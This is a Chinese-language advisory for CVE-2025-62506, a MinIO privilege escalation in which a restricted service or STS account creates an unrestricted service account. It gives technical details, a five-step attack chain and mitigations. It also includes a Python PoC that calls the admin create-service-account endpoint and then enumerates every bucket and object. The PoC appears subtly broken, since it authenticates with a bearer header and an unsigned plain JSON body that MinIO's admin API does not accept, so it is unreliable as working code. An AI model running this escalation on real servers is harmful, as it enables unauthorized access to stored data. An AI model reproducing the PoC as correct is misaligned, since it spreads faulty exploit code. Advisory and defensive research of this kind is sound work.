CVE-2025-62506 MinIO IAM策略验证权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-62506

漏洞类型

权限提升

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MinIO

漏洞概述

CVE-2025-62506是MinIO对象存储系统中发现的一个高危权限提升漏洞，CVSS评分为8.1。该漏洞存在于所有RELEASE.2025-10-15T17-29-55Z之前的MinIO版本中，影响IAM（身份与访问管理）策略验证逻辑。具体而言，具有受限会话策略（restricted session policies）的服务账户（service accounts）和STS（安全令牌服务）账户，在对其自身账户执行操作时（特别是为同一用户创建新服务账户时），可以绕过其内联策略（inline policy）限制。漏洞的根本原因在于代码在验证受限账户的会话策略时错误地依赖了DenyOnly参数。当存在会话策略时，系统应当验证该操作是否被会话策略允许，而不仅仅是验证其未被拒绝。攻击者利用此漏洞可以创建一个不受策略限制的新服务账户，该新账户将拥有父账户的全部权限而非被内联策略所限制。这使得攻击者能够访问超出其预期限制的桶和对象，并修改、删除或创建其授权范围之外的对象。该漏洞已在RELEASE.2025-10-15T17-29-55Z版本中修复。

技术细节

该漏洞的核心位于MinIO的IAM策略验证逻辑中。具体技术原理如下：

1. **策略验证逻辑缺陷**：在受限服务账户或STS账户创建新服务账户时，系统需要验证该操作是否符合当前账户的会话策略（session policy）。然而，代码错误地使用了DenyOnly参数进行验证，而非完整的策略评估。DenyOnly仅检查操作是否被显式拒绝，而未检查操作是否被策略明确允许。

2. **权限继承机制**：当受限账户成功创建一个新服务账户时，新账户会继承父账户的全部权限。正常情况下，会话策略应当限制新账户的权限范围，使其与父账户的受限权限保持一致。但由于验证逻辑缺陷，新账户绕过了内联策略限制，获得了完全权限。

3. **利用条件**：攻击者需要拥有有效的受限服务账户或STS账户凭证，这些凭证通常通过内联策略限制了可访问的桶和操作。攻击者使用这些受限凭证调用CreateServiceAccount API，即可创建一个具有完全权限的新服务账户。

4. **影响范围**：利用成功后，攻击者使用新创建的无限制服务账户凭证，可以访问所有桶和对象，执行任意读写操作，甚至删除或创建对象，完全绕过原有的访问控制策略。

修复方案：MinIO在commit c1a49490c78e9c3ebcad86ba0662319138ace190中修复了该漏洞，正确实现了会话策略的完整验证逻辑，确保受限账户创建新服务账户时新账户继承受限权限而非完全权限。

攻击链分析

STEP 1

步骤1：获取受限凭证

攻击者通过合法途径或泄露获取具有内联策略限制的服务账户或STS账户凭证，该凭证原本限制了可访问的桶和操作范围。

STEP 2

步骤2：调用创建服务账户API

使用受限凭证向MinIO的/admin/v3/create-service-account端点发送请求，尝试创建一个新的服务账户。由于IAM策略验证逻辑错误地使用DenyOnly检查，请求被通过。

STEP 3

步骤3：绕过会话策略验证

MinIO的策略验证代码仅检查操作是否被显式拒绝（DenyOnly），而未验证操作是否被会话策略明确允许。这导致受限账户可以成功创建不受策略限制的新服务账户。

STEP 4

步骤4：获取完全权限账户

新创建的服务账户继承了父账户的全部权限，完全绕过了内联策略限制。攻击者现在拥有一个无限制的服务账户。

STEP 5

步骤5：未授权访问和操作

使用新获取的无限制凭证，攻击者可以访问所有桶和对象，读取、修改、删除或创建授权范围之外的数据，造成数据泄露和完整性破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62506 PoC - MinIO Privilege Escalation via Session Policy Bypass
# This PoC demonstrates how a restricted service account can escalate privileges
# by creating a new service account that inherits full parent privileges

import requests
import json

# Target MinIO server configuration
MINIO_ENDPOINT = "https://minio-target.example.com"
# Restricted service account credentials (with inline policy restrictions)
ACCESS_KEY = "RESTRICTED_ACCESS_KEY"
SECRET_KEY = "RESTRICTED_SECRET_KEY"

def create_privileged_service_account():
    """
    Exploit CVE-2025-62506: Create a new service account using restricted credentials.
    Due to the vulnerability, the new account will have full parent privileges
    instead of being restricted by the inline policy.
    """
    # Step 1: Authenticate as the restricted service account
    session = requests.Session()
    
    # Step 2: Call the CreateServiceAccount API
    # The IAM policy validation logic incorrectly uses DenyOnly check,
    # so it only verifies the action is not denied, not whether it's allowed
    url = f"{MINIO_ENDPOINT}/minio/admin/v3/create-service-account"
    
    payload = {
        "accessKey": "ESCALATED_ACCOUNT_KEY",
        "secretKey": "ESCALATED_ACCOUNT_SECRET",
        "description": "Exploited account via CVE-2025-62506",
        "policy": ""  # Empty policy means no restrictions - should be blocked by session policy
    }
    
    headers = {
        "Authorization": f"Bearer {ACCESS_KEY}:{SECRET_KEY}",
        "Content-Type": "application/json"
    }
    
    response = session.post(url, headers=headers, json=payload)
    
    if response.status_code == 200:
        print("[+] Successfully created escalated service account!")
        result = response.json()
        print(f"[+] New AccessKey: {result.get('accessKey')}")
        print(f"[+] New SecretKey: {result.get('secretKey')}")
        print("[+] The new account has FULL parent privileges, bypassing inline policy!")
        return result
    else:
        print(f"[-] Failed: {response.status_code} - {response.text}")
        return None

def access_unauthorized_buckets(new_credentials):
    """
    Use the newly created unrestricted service account to access
    buckets and objects that should be restricted by the inline policy.
    """
    from minio import Minio
    
    client = Minio(
        MINIO_ENDPOINT.replace("https://", "").replace("http://", ""),
        access_key=new_credentials["accessKey"],
        secret_key=new_credentials["secretKey"],
        secure=True
    )
    
    # List all buckets - should be restricted but is now accessible
    buckets = client.list_buckets()
    print(f"[+] Accessible buckets (should be restricted): {[b.name for b in buckets]}")
    
    # Access restricted objects
    for bucket in buckets:
        objects = list(client.list_objects(bucket.name, recursive=True))
        print(f"[+] Objects in '{bucket.name}': {[o.object_name for o in objects]}")

if __name__ == "__main__":
    print("[*] CVE-2025-62506 - MinIO Privilege Escalation PoC")
    print("[*] Affected: All versions prior to RELEASE.2025-10-15T17-29-55Z")
    print()
    
    new_account = create_privileged_service_account()
    if new_account:
        access_unauthorized_buckets(new_account)

影响范围

MinIO < RELEASE.2025-10-15T17-29-55Z

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）审查并限制所有服务账户的权限，确保使用最小权限原则；2）监控admin API调用日志，特别关注create-service-account端点的异常调用；3）临时禁用不必要的服务账户创建功能；4）轮换所有现有服务账户的访问密钥，撤销可疑账户；5）使用网络访问控制列表（ACL）限制只有可信IP可以访问MinIO管理API；6）启用详细的审计日志，及时发现未授权的服务账户创建行为。